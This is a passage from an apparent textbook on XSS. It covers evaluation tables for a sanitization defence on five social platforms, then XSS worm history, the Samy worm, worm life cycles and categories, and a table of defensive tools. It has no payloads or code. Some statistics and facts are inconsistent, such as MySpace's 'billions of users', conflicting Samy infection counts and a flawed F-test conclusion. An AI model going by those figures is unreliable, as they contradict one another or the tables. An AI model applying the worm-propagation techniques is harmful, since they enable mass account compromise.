TABLE 4.5 Observed Results on Diferent Testing Platforms


Performance Parameters
Malicious
Attack Vectors Malicious Scripts
Categories Injected # of TP # of FP # of TN # of FN
Elgg
HTML Malicious Tags 35 32 1 1 1
JavaScript Attack Vectors 20 18 1 1 0
CSS Attack Vectors 15 13 1 0 1
URL Attack Vectors 22 20 2 0 0
HTML Malicious Event 35 33 0 2 0
Handler
WordPress
HTML Malicious Tags 35 33 2 0 0
JavaScript Attack Vectors 20 18 0 2 0
CSS Attack Vectors 15 14 1 0 0
URL Attack Vectors 22 18 1 2 1
HTML Malicious Event 35 32 1 1 1
Handler
Humhub
HTML Malicious Tags 35 31 3 1 0
JavaScript Attack Vectors 20 17 1 1 1
CSS Attack Vectors 15 12 2 1 0
URL Attack Vectors 22 19 1 2 0
HTML Malicious Event 35 33 0 1 1
Handler
Joomla
HTML Malicious Tags 35 32 2 1 0
JavaScript Attack Vectors 20 17 0 2 1
CSS Attack Vectors 15 13 1 1 0
URL Attack Vectors 22 20 1 1 0
HTML Malicious Event 35 32 2 0 1
Handler
Drupal
HTML Malicious Tags 35 33 2 0 0
JavaScript Attack Vectors 20 18 0 2 0
(Continued )
Sanitization Mechanisms for Defending against XSS Attack    ◾   97

TABLE 4.5 (CONTINUED) Observed Results on Diferent Testing Platforms


Performance Parameters
Malicious
Attack Vectors Malicious Scripts # of
Categories Injected # of TP # of FP TN # of FN
CSS Attack Vectors 15 13 2 0 0
URL Attack Vectors 22 20 2 0 0
HTML Malicious Event 35 33 0 1 1
Handler

for all fve testing platforms. Tis is done by dividing the number
of XSS attack payload detected to the number of malicious scripts
exploited for each category of attack vectors. Figure 4.6 highlights
the detection rate of fve OSN web applications with respect to
individual categories of attack vectors. It is clearly refected from
Figure 4.6 that the highest detection rate is observed in the Elgg as
compared to all other platforms of OSN-based web applications.

4.4 PERFORMANCE ANALYSIS


Tis section provides the performance assessment of the pro-
posed approach. Heretofore, we show how efcient our proposed
approach would be against XSS attack by testing it against fve
social media platforms. Here, we analyze the performance by
using two statistical analysis methods: F-measure and F-test
hypothesis.

4.4.1 Using F-Measure


F-measure is the harmonic mean of two values: precision and
recall. It is calculated to determine the accuracy of experimental
testing conducted for the proposed approach. We fnd out the val-
ues of all these parameters as per the equations given below:

FalsePositves(FP)
False Positive Rate ( FPR ) =
FalsePositives(FP)+
+ True Negatives(TN)
TABLE 4.6 Performance Analysis by Calculating F-Measure
Web
Application Total # of TP # of FP # of TN # of FN Precision FPR FNR Recall F-Measure
Elgg 127 116 5 4 2 0.958 0.5 0.016 0.983 0.970
98 ◾ Cross-Site Scripting Attacks

Wordpress 127 115 5 5 2 0.958 0.5 0.017 0.982 0.970


Humhub 127 112 7 6 2 0.941 0.538 0.017 0.982 0.961
Joomla 127 114 6 5 2 0.950 0.545 0.017 0.982 0.967
Drupal 127 117 6 3 1 0.951 0.67 0.008 0.991 0.970
Sanitization Mechanisms for Defending against XSS Attack    ◾   99

False Negatives(FN)
False Negative Rate ( FNR ) =
False Negatives(FN))+TruePositives(TP)

True positive ( TP )
Precision =
true positive ( TP ) + false positive ( FP )

True positive ( TP )
Recall =
true positive ( TP ) + false negative ( FN )

2 ( TP )
F-Measure =
2 ( TP ) + FP + FN

Here, we calculate the precision, recall, and fnally the F-Measure


on the basis of the observed experimental results on fve difer-
ent platforms. Te F-Measure generally analyzes the performance
of system by calculating the harmonic mean of precision and
recall. Te analysis conducted reveals that the proposed approach
exhibits high performance as the observed value of F-Measures
in all the platforms of web applications is greater than 0.9. Table
4.6 highlights the values of the above parameters for fve testing
platforms.

4.4.2 Using F-test Hypothesis


It is always better to support your statement by using as many
solutions as you can. So we have used F-test hypothesis method
as the second supporting method to determine the performance.
In F-test hypothesis method, we defne two hypotheses, and at the
last, only one hypothesis is true. Tese are:

• Null Hypothesis: Tis assumption states that the number of


malicious XSS attack vector payloads injected (S1) is equal
to the number of injected scripts detected (S2), i.e. S1 = S2.
100 ◾ Cross-Site Scripting Attacks

• Alternate Hypothesis: Well, ideal situation is unpredictable,


so this hypothesis states that the number of malicious scripts
injected (S1) is more than the number of scripts detected
(S2), i.e. S1 > S2.

Te level of signifcance is (α = 0.05). Te related statistics of XSS


attack vector payload applied and detected are illustrated in the Table
4.7 and 4.8. In our work, we used a total of 127 XSS attacks vectors for
testing on fve platforms individually. But note that, for evaluating the
performance of the proposed approach by using F-test, we injected a
diferent number of XSS attack vectors in all the fve web applications.
For scripts injected, we have

Number of Malicious Scripts Injected mean (µ) = 122


Number of Observation (N1) = 5
Degree of Freedom dof (df1) = N1 – 1 = 4.
S1= 2.549

For scripts detected, we have

Number of Malicious Scripts Detected mean (µ) = 116


Number of Observation (N2) = 5
Degree of Freedom dof (df2) = N2 – 1 = 4.
S2= 3.905

Now, calculate the value of F-test as

FCALC = S12 S22 =6.4974 15.249=0.4260

We have found that the tabulated value of F-Test, at df1 = 4, df2 =


4 and α = 0.05 is
TABLE 4.7 Statistics of XSS Attack Vectors Applied
Standard Deviation
N1
2
# of Malicious Scripts S1 = å(X - m) i (N1 -1)
Injected (Xi) (Xi – μ) (Xi – μ) 2 i =1

122 0 0 2.549
125 3 9
120 –2 4
119 –3 9
124 2 4
N1
Mean (µ) = i N1 = 122 2
i
˛X å(X - m) = 26
i =1
Sanitization Mechanisms for Defending against XSS Attack    ◾   101
TABLE 4.8 Statistics of XSS Attack Vectors Detected
Standard Deviation
N2
2
# of Malicious Scripts S2 = å(X - m) i (N 2 -1)
Detected (Xj) (Xi – μ) (Xi – μ) 2 i =1

120 4 16 3.905
118 2 4
102 ◾ Cross-Site Scripting Attacks

117 1 1
110 –6 36
118 2 4
N1
Mean (µ) = i N 2 = 116 2
i
˛X ˛ (X − µ) = 61
i =1
Sanitization Mechanisms for Defending against XSS Attack    ◾   103

F(df1 ,df2 ,1-a ) = F( 4, 4, 0.95) = 6.3882

Here, we observe that the calculated F-test value is smaller than


the tabulated F-test at same parameter value, i.e FCALC < FTabulate.
So, we accept the alternate hypothesis, i.e the scripts injected
are more than the scripts detected and we are confdent enough
that any diference in the sample standard deviation is due to
random error.

4.4.3 Comparative Analysis


Tis subsection discusses the comparison of our proposed
approach with the other recent existing XSS defensive meth-
odologies. Table 4.9 compares the existing sanitization-based
state-of-the-art techniques with our work based on nine identi-
fed metrics: Category of XSS attack Detected (COXD), Inclusion
of Legitimate Inputs (ILI), Detection of Malicious JavaScript
Functions (DMJSF), Automated Pre-processing Required (APR),
XSS attack Detection Profciency (XDP), Source Code Monitoring
(SCMon), Source Code Modifcation (SCMod), Scrutinizing
Mechanism (SCMech), and Context-Aware Sanitization (CAS).
In the existing techniques, lots of pre-processing are required
in the existing frameworks of web applications for their successful
execution on diferent platforms of web browsers. Context-aware
sanitization is simply evaded by most of these existing sanitiza-
tion-based techniques. Although, they perform the sanitization
on the XSS attack vectors in a context-insensitive manner. Such
sort of conventional sanitization methods are easily bypassed by
the attackers.

4.5 CHAPTER SUMMARY


Web applications over the internet provide numerous services
including online shopping, banking, social interaction, online
conferences, video chatting, etc. Among all, social media is
the fastest-growing network. It allows its users to interact with
TABLE 4.9 Summary of Comparison of Existing XSS Defensive Methodologies with Our Work
Metrics
Techniques COXD ILI DMJSF APR XDP SCMon SCMod SCMech CAS
Livshits et al. [21] Refected Yes No Yes Medium Yes Yes Passive No
Samuel et al. [23] Refected, Stored Yes No Yes Low Yes No Passive Yes
104 ◾ Cross-Site Scripting Attacks

Saxena et al. [25] Refected No Yes No Medium No Yes Active No


Saxena et al. [26] Refected Yes No Yes Low Yes Yes Passive No
Hooimeijer et al. [16] Refected, Stored Yes Yes No Medium No Yes Passive No
Balzarotti et al. [4] Refected Yes No Yes Medium Yes No Active No
Our Work Stored, Refected No Yes No Acceptable No No Active Yes
Sanitization Mechanisms for Defending against XSS Attack    ◾   105

anyone across the globe irrespective of their geographical dis-


tance. In addition, it is used to share personal and professional
information in the form of posts, albums, messages, etc. Tis
feature of social networks attracts many security challenges like
Cross-Site Scripting (XSS) attacks. Terefore, in this chapter, we
have presented an approach to detect XSS attack and mitigate it.
It works by intercepting two critical ways in the proliferation path
of XSS attack: (1) illegitimate request to the server and (2) access
to the views at the client side. It is a novel technique that can efec-
tively defend against XSS attack. Te performance analysis of the
proposed approach has revealed that this framework recognizes
the XSS attack with very low false positives, false negatives, and
acceptable performance overhead as compared to existent XSS
defensive methodologies.

REFERENCES
1. 523 XSS vectors available. [online] Available at: http://xss2.tech-
nomancie.net/vectors.
2. @XSS vector twitter account. [online] Available at: https://twitter.
com/XSSVector.
3. Aggarwal, C. C., & Zhai, C. (2012). A survey of text clustering
algorithms. In Mining Text Data (pp. 77–128). Springer, Boston,
MA.
4. Balzarotti, D., Cova, M., Felmetsger, V., Jovanovic, N., Kirda, E.,
Kruegel, C., & Vigna, G.. (2008). Saner: Composing static and
dynamic analysis to validate sanitization in web applications. In
IEEE Symposium on Security and Privacy. SP 2008 (pp. 387–401).
IEEE, Oakland, CA.
5. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site script-
ing on web applications: A review, taxonomy and challenges.
International Journal of Web Based Communities, 14(1), 64–93.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
7. Drupal social networking site. [online] Available at: https://www.
drupal.org/download.
106 ◾ Cross-Site Scripting Attacks

8. Elgg social networking engine. [online] Available at: https://elgg.


org.
9. ESAPI, OWASP Enterprise Security API. (2009). [online] Available
at: http://www.owasp.org/index.php/ESAPI#tab=Project_Details
(accessed February 2010).
10. Gupta, B. B., & Agrawal, D. P. (eds.). (2019). Handbook of Research
on Cloud Computing and Big Data Applications in IoT. IGI Global.
11. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing, 7(1),
1–31.
12. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
13. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype
method to discover workfow violation and XSS vulnerabili-
ties in PHP web applications. In Proceedings of the 12th ACM
International Conference on Computing Frontiers (p. 59). ACM.
14. Hansen, R. XSS (cross site scripting) cheat sheet. Filter evasion
cheat sheet. [online] Available at: https://www.owasp.org/index.ph
p/XSS_Filter_Evasion_Cheat_Sheet.
15. Heiderich, M. Html5 security cheatsheet. [online] Available at:
http://html5sec.org.
16. Hooimeijer, P., Livshits, B., Molnar, D., Saxena, P., & Veanes, M.
(2011). Fast and precise sanitizer analysis with BEK. In Proceedings
of the 20th USENIX Conference on Security (pp. 1–1). USENIX
Association.
17. Humhub social networking site. [online] Available at: https://
www.humhub.org/en.
18. Joomla social networking site. [online] Available at: https://www.
joomla.org/download.html.
19. Joshi, R. C., & Gupta, B. B. (eds.). (2019). Security, Privacy, and
Forensics Issues in Big Data. IGI Global.
20. Jsoup HTML parser. [online] Available at: https://jsoup.org/.
21. Livshits, B., & Chong, S. (2013). Towards fully automatic placement
of security sanitizers and declassifers. ACM SIGPLAN Notices,
48(1), 385–398.
Sanitization Mechanisms for Defending against XSS Attack    ◾   107

22. Metzler, D., Dumais, S., & Meek, C. (2007). Similarity measures
for short segments of text. In European Conference on Information
Retrieval. Springer, Berlin, Heidelberg.
23. Samuel, M., Saxena, P., & Song, D. (2011). Context-sensitive auto-
sanitization in web templating languages using type qualifers.
In Proceedings of the 18th ACM Conference on Computer and
Communications Security (pp. 587–600). ACM.
24. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A sur-
vey of detection methods for XSS attacks. Journal of Network and
Computer Applications, 118, 113–143.
25. Saxena, P., Hanna, S., Poosankam, P., & Song, D. (2010). FLAX:
Systematic discovery of client-side validation vulnerabilities in
rich web applications. In NDSS Symposium.
26. Saxena, P., Molnar, D., & Livshits, B. (2011). SCRIPTGARD:
Automatic context-sensitive sanitization for large-scale legacy
web applications. In Proceedings of the 18th ACM Conference on
Computer and Communications Security (pp. 601–614). ACM,
Chicago, IL.
27. Technical attack sheet for cross site penetration tests. [online]
Available at: http://www.vulnerability-lab.com/resources/do
cuments/531.txt.
28. WordPress. [online] Available at: http://wordpress.org/.
29. XSS flter evasion cheat sheet. [online] Available at: https://ww
w.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
30. Zhang, Z., & Gupta, B. B. (2018). Social media security and trust-
worthiness: Overview and new direction. Future Generation
Computer Systems, 86, 914–925.
CHAPTER 5

Real-World XSS
Worms and
Handling Tools

I n this chapter, we discuss about the XSS worm. Tis chap-


ter presents information related to the XSS worm including
its lifecycle, real world incidences, and types of XSS worm. Tis
theory about XSS worm is supported by a case study on one of
the most dangerous XSS worms, i.e. Samy worm. In addition, we
present the handling tools that assist in detecting and alleviating
the efect the XSS worm.

5.1 OVERVIEW OF XSS WORM


Approximately, 80 percent of the web applications are infected
by the XSS vulnerability. Te major reason behind its existence
is the security negligence while developing web applications and
improper input validation entered by the user in the input feld of
the web sites. One of the major motives of the attacker is to infect
as many users as possible of any system. Tis possibility exists
109
110 ◾ Cross-Site Scripting Attacks

because of the XSS vulnerability in the web applications [3, 4, 9,


11, 13, 14, 15, 26]. Te XSS worm [5] is the weapon in the hands of
attacker to achieve this objective. Te XSS worm is the malicious
vector that abuses the XSS vulnerability and attempts to infect
many people’s systems when they visit the infected web site, by
propagating itself to their profle or browser. Its infection occurs
in two stages: frst, the server gets tainted by storing persistent
XSS payload that the server does not execute. Second, the browser
gets infected due to the stored payload execution. Ten, this pay-
load assists in initializing DDoS attack and performs other mali-
cious activities [7, 8, 10]. Tis relationship from server to browser
is one-to-many as one server can infect multiple browsers [2].

5.1.1 Real-World Incidences of XSS Worm


Various industries have been infected by the XSS worms [12]. A
recent study by Faghani et al. [5] discusses the many real XSS
worms that have infected approximately all the online applica-
tions. Te XSS worm is diferent from other conventional viruses
because, generally, the virus resides and implements in the same
system. But the XSS worm runs in the browser and its corre-
sponding code is stored at the server. And also, the XSS worm is
platform independent unlike conventional virus because the XSS
worm is encapsulated in HTML and HTTP protocols. And these
two are supported by every browser, making the infecting space
of XSS worm wider and dangerous. Table 5.1 shows the list of XSS
worms that infect many popular platforms on the internet [4]. For
many years, the attackers have repeatedly used these worms to
contaminate more web applications. Gaia is an XSS worm which
has infected gaming web applications. Te Renren worm has
severely hit Renren social network. Te Yamanner XSS worm was
discovered in Yahoo! Mail. Facebook was also contaminated by
the Boonana XSS worm. It is shown in Table 5.1 that the XSS worm
has contaminated the popular web applications that serve a large
number of people around the globe so that it can infect as many
Real-World XSS Worms and Handling Tools    ◾   111

TABLE 5.1 Real-World XSS Worm


XSS Worm Incident Year
Facebook worm 2011
Boonana 2010
OnMouseOver 2010
Flash-based worm 2009
Renren 2009
Mikeyy 2009
XSS bug 2009
Justin.tv worm 2008
W32/Kutwormer 2007
Gaia 2007
Hi5 2007
Bom Sabado 2007
MW.orc 2006
Space fash 2006
Yamanner 2006
Xanga 2005
Samy 2005

users as possible. Afer many years, these worms are now spread-
ing across all web applications, which can provide a platform for
the XSS worms to proliferate. Te XSS worm is more likely to ini-
tiate in web applications with community-driven characteristics
like social networking, forums, blogs, web mails, chat rooms, etc.

5.1.2 Case Study of the Famous Samy Worm


In 2005, one worm altered the profles of billions of users of the
highly prominent and beloved social media platform MySpace.
Tis worm was developed by “Samy Kamkar,” and he named it
as “Samy worm” [27]. Tis worm was written in JavaScript code
which is not fltered by MySpace. His main goal was to get famous
and add more friends to his friends list. Samy posted the mali-
cious code frst on his profle page. Terefore, whenever a legiti-
mate MySpace user visits Samy’s profle, the malicious payload
112 ◾ Cross-Site Scripting Attacks

forces the user browser to add Samy in the friends list, by using
XmlHttpRequest (XHR). Tis worm posts a message on the vic-
tim’s profle page as “Samy is my hero” and infects the user’s pro-
fle with its copy. In this way, this worm had abused more than 1
million legitimate users of MySpace within a time period of 20
hours. Figure 5.1 depicts the number of users infected by the dif-
ferent worms and presents that Samy is the only worm with high
infection rate [6]. Tis fgure basically provides a comparative
analysis on the infection rate between other worms such as Code
Red I and Code Red II with Samy worm.
Tis worm caused MySpace to get shutdown and to fx the
vulnerability. Samy got the control of over 1 million users. Just
think of what could happen with control over large numbers of
accounts and by grabbing many gigabits of network bandwidth
browsers linked with Gmail, bank accounts, trade markets, and
so on. From this, we can estimate the efects of the XSS worm.
Te attacker might be able to launch DDoS attack on a large scale.
But what makes Samy worm propagate at such a high rate
when other worms can’t? Let’s discuss this in detail. Other inter-
net worms such as Code Red I propagate in network through

FIGURE 5.1 Number of users infected by diferent worms.


Real-World XSS Worms and Handling Tools    ◾   113

peer-to-peer distribution which causes network congestion and


eventually slows down the speed of propagation and fnally col-
lapses. But the XSS worm distributes through a central point, i.e.
server. It executes at the client side; hence, no peer-to-peer distri-
bution is possible. Tis restricts the network to be overburdened.
So, if any user visits the user, it means there is a possible target
of the XSS worm and also it is platform independent, making its
infection rate higher and more dangerous.

5.2 LIFE CYCLE OF XSS WORM


Unlike other worms, the XSS worm infects only web browsers and
distributes itself by forcibly copying its malware code into other
places like posting comments with embedded malware codes to
infect other users. To develop efcient and robust solutions for
confning the infection rate of any worm, it is better to understand
the life cycle of the worm. So, in this section, we discuss the stages
in which a worm resides throughout its life [4]. Figure 5.2 high-
lights these stages.

1. Vulnerability Abuse: It is the initial phase wherein the


attacker entices the victim to visit the web site with mali-
cious XSS worm code, which has been inserted by the
attacker. Tis worm code is highly obscured and possesses
the capability to propagate itself into the user’s profle. Te
XSS worm is injected into the web site by the attacker by
abusing XSS vulnerability.
2. Privileges Capturing: Te malicious code gets executed
in the victim’s browser, and thus the attacker gains access
to all the rights or privileges that the user possesses on the
infected web site. Tereby, the worm can automatically send
malicious messages to the friends of the victim.
3. Replication: In this stage, the worm replicates a copy to the
victim’s profle page. Here, the worm sends an amendment
114 ◾ Cross-Site Scripting Attacks

FIGURE 5.2 Stages during the life cycle of the XSS worm.

request to the server. It looks like a legitimate request to the


server as if it is made by the legitimate user. Now, the worm
modifes the content of the victim’s account on social net-
work with a copy of itself included.
4. Reproduction: When other legitimate users visit the
infected user’s profle then the worm executes steps 2 and 3
and facilitates its propagation throughout the network. Tis
way, the XSS worm proliferates to infect a large number of
users on any network.

5.3 CATEGORIES OF XSS WORM


In this section, we shed some light on the diferent types of XSS worms
[27]. Te XSS worms may have diferent names and logic, but internally
all worms share the same motive or same propagation style. We have
Real-World XSS Worms and Handling Tools    ◾   115

classifed the XSS worms into three types based on their style of infec-
tion and propagation as Exponential XSS worm, XSS Flash worm, and
Linear XSS worm. Now, let’s dissect each type and delve deep into it.

5.3.1 Exponential XSS Worm


Suppose an attacker wants to perform multiple malicious activi-
ties, say, account hijacking, gaining remote access to the victim’s
machine, replicating a copy of itself to proliferate, and performing
other attacks like Cross-Site Request Forgery (CSRF), DDoS, and
so on. One way is to write the exploit code individually. But it is
bad as the chances of being identifed are high. What if there is a
way to chain all these attacks by abusing a single vulnerability? Of
course, there exists an answer to this question and it is the main
theory behind the Exponential XSS worm.
Te Exponential XSS worm possesses the capability to navigate
through many domains and perform attacks on various sites by
exploiting only a single XSS vulnerability. Te number and the
nature of attacking sites depend on the motive of the attacker. To
achieve its objective, frst, the attacker has to identify the sites of his
interest and then identify the existing vulnerability. Afer this, the
attacker needs to craf the malicious worm logic and attempts to
chain the target sites. Tis may be done via redirection method or
using IFrame method. But the latter one is fast and more advanced.
Now the target sites can be exploited for sending spam messages,
account hijacking, injecting malware to open backdoors, bank
account forgery, session stealing, and so on. Te attacks can have
harmful efects on the victim and may range from bankruptcy to
life ruining by showing involvement in child pornography and/or
terrorist events. Te only thing is that the range of malicious activ-
ities is restricted only by the imagination of the attacker.

5.3.2 XSS Flash Worm


Worms such as Code Red I replicate themselves into the vulner-
able machine by exploiting some kind of vulnerability. But their
116 ◾ Cross-Site Scripting Attacks

efciency depends on how fast they can spread and how many
targets they infect. Te attacker who develops the worm wants to
infect as many users as possible because a worm could be more
catastrophic if it spreads quickly. Te speed of infection is pro-
portionate to the identifcation of vulnerable target machine. Te
vulnerable machine can be recognized through scanning, but lin-
ear scanning is not sufcient. Terefore, hit-list scanning is done
to gain maximum beneft. It uses a pre-compiled list of vulner-
able machines. Tis is the main idea behind XSS Warhol worm,
also known as XSS Flash worm. It is the fastest propagating worm
on the internet which infects almost every vulnerable machine
worldwide, within 15 minutes of its initiation. It is a conceptual-
ized worm, as in reality such infection speed is not possible. Te
most threating worm, i.e. Samy worm, has infected 100,000 users
within 20 hours.
In the initial phase, the attacker collects a pre-complied list of
vulnerable machines and releases the Warhol worm. So whenever
this worm infects a machine, it divides the list into two parts,
keeping one list with itself, and gives the other to the infected
machine. Tis ensures scanning of all machines in the list under a
minute, and the worm replicates itself on all identifed machines.
However, this process slows down if the number of uninfected
machines is less. So permutation scanning is used, in which the
already-infected machine behaves diferently so that the time to
re-infect can be saved. Here, all worms have the same pseudo ran-
dom permutation of searching address space. It helps in increas-
ing the propagation speed by reducing the re-infection efort.
Finally, the attacker achieves a higher infection rate with complete
scanning.
Te infection accuracy of XSS Flash worm is high because XSS
worms are platform independent. It is highly likely that if one
browser is exploited with a malicious code, then the others will
also get infected; afer all, every browser has the same functional-
ity and displays any site with the same interface and functions.
Real-World XSS Worms and Handling Tools    ◾   117

5.3.3 Linear XSS Worm


What if an attacker wants to design an XSS worm that can be
released on one site and it starts infecting other sites automati-
cally? Tinking about the solution provides two ways: one is
Linear XSS worm and the other is Hydra XSS worm. Linear XSS
worm utilizes the persistent XSS attack method to release on the
parent site and then performs its activities and propagates to
other suspicious sites and repeats the same until the scanning list
is complete, whereas the Hydra XSS worm releases on the parent
site and starts propagating to other vulnerable sites simultane-
ously. Linear worm requires low network bandwidth as it prop-
agates only to a single site at a time, and it would die if any of
the targets in the scanning list get fxed; i.e. the vulnerability gets
resolved or the server gets shutdown. Hydra worm, on the other
hand, demands more network bandwidth as multiple sites’ data
are required at a time. So the attacker crafs a worm with a mix
logic of both.

5.4 HANDLING TOOLS


According to many security organizations like OWASP and White
Hat Security, XSS and SQL injection are the only vulnerabilities
that have been prevalent for a long time in web applications. Te
XSS attack is easier and hence the main fascinating one for the
attacker. Diferent researchers and industry security experts have
developed open-source tools/scanners to detect, exploit, and
report XSS vulnerability to the user. Terefore, the main goal of
this section is to highlight some of the popular tools or techniques
to defend against the XSS attack. Table 5.2 shows a list of these
tools with their brief description.

5.5 CHAPTER SUMMARY


Integration of breakthrough technologies into designing web
applications makes digital business boom and, thereby, the
number of active internet actors. Te XSS attack incidences are
118 ◾ Cross-Site Scripting Attacks

TABLE 5.2 Tools and Techniques to Defend XSS


S. R.
No. Tool Platform Explanation
1. OWASP Multiplatform It is the state-of-the-art framework
Xenotix XSS developed under OWASP projects
Exploit to detect and exploit the XSS
Framework attack. It does XSS detection by
[22] performing a scan within the
browser engines in which the
payload refects in the real world.
It incurs low false-positive rate. It
involves three fuzzers to minimize
the scanning time and outputs
better results.
2. Subgraph Vega Multiplatform It is the testing and scanning tool
Vulnerability (Linux, OS to detect web application
Scanner [28] X, and vulnerabilities. It includes
Windows) automated scanners for testing
and intercepting proxy to identify
vulnerabilities. It is written in
JavaScript and is easy to generate
attack vectors by using API.
3. OWASP Multiplatform It is an API to ensure that the user
Antisamy [20] can only provide data that
complies with HTML/CSS rules.
It ensures that the user cannot
supply malicious code in their
profle, comments, etc.
4. HTML Purifer Multiplatform It is an HTML flter library written
[17] in PHP. It removes malicious
codes by using an audited
whitelist. It accomplishes its task
with compliance to standards.
5. OWASP HTML Multiplatform It is an easy and fast HTML sanitizer
Sanitizer [21] developed in Java under OWASP
projects. It performs the sanitization
of malicious HTML codes. It
permits only authored HTML from
third-party applications to defend
against the XSS attack.
(Continued )
Real-World XSS Worms and Handling Tools    ◾   119

TABLE 5.2 (CONTINUED) Tools and Techniques to Defend XSS


S. R.
No. Tool Platform Explanation
6. htmLawed [16] Multiplatform It is written in PHP for fltering the
HTML text so that the HTML
tags and attributes which are
permitted by the site
administrator can be accessed and
processed by the browser. It is fast
and customizable and requires
low memory usage.
7. XSSer [31] Linux Cross-site scripter is an automatic
(Ubuntu) framework to detect, exploit, and
notify XSS vulnerabilities present
in the web applications.
8. WebScarab [30] Multiplatform Tis framework is written in Java
and is used for monitoring
applications using HTTP or
HTTPS protocol. Tis works as an
intercepting proxy to analyze
ingoing and outgoing requests
and responsive web pages. It can
detect multiple web application
vulnerabilities like SQL injection,
XSS, CSRF, etc.
9. W3af [29] Multiplatform It is built using Python and aims to
provide a better testing platform
for web application vulnerabilities.
It consists of both graphical user
interface and console user
interface. Tis framework is easier
to use and is easily extendable.
10. OWASP Zed Cross- ZAP is an open-source and
Attack Proxy platform multiplatform tool, developed by
(ZAP) [23] OWASP. Basically, it is a
penetration tester that scans the
web applications for multiple
vulnerabilities like XSS, SQL
injection, CSRF, and so on.
(Continued )
120 ◾ Cross-Site Scripting Attacks

TABLE 5.2 (CONTINUED) Tools and Techniques to Defend XSS


S. R.
No. Tool Platform Explanation
11. Netsparker [19] Multiplatform It is a multi-user, versatile, and
scalable tool which own proof-
based scanning and helps in
detecting web application
vulnerabilities like XSS and SQL
injection. It is a fully automated
tool which is integrated during
the development of sofware.
13. Probely [25] Multiplatform It provides an easy-to-use interface
to scan web applications for
recognizing diferent
vulnerabilities. It also reports all
the evidences and suggests some
solutions to fx them.
13. ImmuniWeb Cross- It is a multilayer web application
On-demand platform testing tool that combines the
[18] capabilities of AI and machine
learning methods. It ofers fast,
scalable, and economical method
for identifying vulnerabilities. It
covers all the top 10
vulnerabilities range given by
OWASP.
14. Power fuzzer Multiplatform It is an automated, modular, and
[24] customized fuzzer that depends
on another fuzzer. It is capable of
detecting XSS, SQL, and LDAP
injection.
15. Burp Scanner Multiplatform It is a fully automated penetration
[1] tester that is used by the security
experts to test an application. It
can be integrated with other
techniques to get efective results.
Real-World XSS Worms and Handling Tools    ◾   121

dominating the digital space, not because of the unavailability


of efcient and robust techniques but because of the prolifera-
tion of social networking sites. In this case, the malicious XSS
attack payload could traverse the entire network through har-
nessing social relationship and grasping sensitive information, or
by performing other malicious tasks. Consequently, this chapter
has taken the reader in the direction of getting more informa-
tion on the XSS worm. We have presented the basic concept of
the XSS worm and have discussed the case study of the famous
Samy worm. Moreover, the lifecycle of the XSS worm has been
described in order to assist in understanding how a worm gets
disseminated in a network. Aferwards, we categorized XSS
worms and fnally ended with a brief discussion on the diferent
tools and techniques used to detect and mitigate several vulner-
abilities, especially XSS.

REFERENCES
1. Burp scanner. [online] Available at: https://support.portswigger.ne
t/customer/portal/articles/1783127-using-burp-scanner.
2. Cao, Y., Yegneswaran, V., Porras, P. A., & Chen, Y. (2012).
PathCutter: Severing the self-propagation path of XSS JavaScript
worms in social web networks. In NDSS.
3. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework
for preserving the privacy of online users against XSS worms
on online social network. International Journal of Information
Technology and Web Engineering, 14(1), 85–111.
4. Chaudhary, P., Gupta, S., & Gupta, B. B. (2016). Auditing defense
against XSS worms in online social network-based web applica-
tions. In Handbook of Research on Modern Cryptographic Solutions
for Computer and Cyber Security (pp. 216–245). IGI Global.
5. Faghani, M. R., & Nguyen, U. T. (2013). A study of XSS worm
propagation and detection mechanisms in online social networks.
IEEE Transactions on Information Forensics and Security, 8(11),
1815–1826.
6. Faghani, M. R., & Saidi, H. (2009). Social networks’ XSS worms.
In Proceedings of the 12th IEEE International Conference on
Computational Science and Engineering (CSE'09). IEEE.
122 ◾ Cross-Site Scripting Attacks

7. Gupta, B. B. (ed.). (2018). Computer and Cyber Security: Principles,


Algorithm, Applications, and Perspectives. CRC Press.
8. Gupta, B. B., & Gupta, A. (2018). Assessment of honeypots: Issues,
challenges and future directions. International Journal of Cloud
Applications and Computing, 8(1), 21–54.
9. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the
browser-side context-aware sanitization of suspicious HTML5
code for halting the DOM-based XSS vulnerabilities in cloud.
International Journal of Cloud Applications and Computing, 7(1),
1–31.
10. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for
Computer and Cyber Security: Principle, Algorithms, and Practices.
CRC Press.
11. Gupta, S., & Gupta, B. B. (2015). BDS: Browser dependent XSS sani-
tizer. In Handbook of Research on Securing Cloud-Based Databases
with Biometric Applications (pp. 174–191). IGI Global.
12. Gupta, S., & Gupta, B. B. (2017). Detection, avoidance, and attack
pattern mechanisms in modern web application vulnerabilities:
Present and future challenges. International Journal of Cloud
Applications and Computing, 7(3), 1–43.
13. Gupta, S., & Gupta, B. B. (2018). Robust injection point-based
framework for modern applications against XSS vulnerabilities in
online social networks. International Journal of Information and
Computer Security, 10(2–3), 170–200.
14. Gupta, S., & Gupta, B. B. (2019). Evaluation and monitoring
of XSS defensive solutions: A survey, open research issues and
future directions. Journal of Ambient Intelligence and Humanized
Computing, 10(11), 4377–4405.
15. Gupta, S., Gupta, B. B., & Chaudhary, P. (2018). A client-server
JavaScript code rewriting-based framework to detect the XSS
worms from online social network. Concurrency and Computation:
Practice and Experience, 31(21), e4646.
16. htmlLawed. [online] Available at: https://www.bioinformatics.org
/phplabware/internal_utilities/htmLawed/.
17. HTML purifer. [online] Available at: http://htmlpurifer.org/.
